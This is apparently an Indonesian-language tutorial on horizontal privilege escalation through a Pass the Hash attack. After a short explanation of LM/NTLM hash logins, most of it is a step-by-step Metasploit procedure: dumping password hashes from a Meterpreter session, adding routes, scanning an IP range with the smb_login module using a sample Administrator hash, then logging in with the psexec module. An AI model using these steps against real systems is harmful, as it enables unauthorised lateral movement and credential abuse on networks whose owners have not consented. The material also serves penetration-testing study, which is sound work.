Horizontal privilege escalation adalah tahap ketika kita ingin mendapatkan hak akses yang tingkatnya sama alangkah untuk mengakses suatu yang kita tidak dapat akses. Biasanya Horizontal Privilege Escalation menyerang komputer berbeda dalam 1 network, untuk bypass Firewall, atau mendapatkan akses yang hanya suatu komputer bisa akses.
Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi
Mari langsung bahas aja ya :)
oke ketika kau sudah punya Meterpreter session masukan "hashdump" perintah ini akan memberi username dan juga hash password dari username yang kita leak kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP liat sesi background kita dengan memasukan perintah "background" kemudian masukan "route add (ip korban) (ip proxy mu)"
kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah use auxiliary/scanner/smb/smb_login set RHOSTS 10.10.10.101-120 set SMBUser Administrator set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b set verbose false run
yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini
use windows/smb/psexec
set SMBUser Administrator
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b
set RHOST 10.10.10.103
exploit
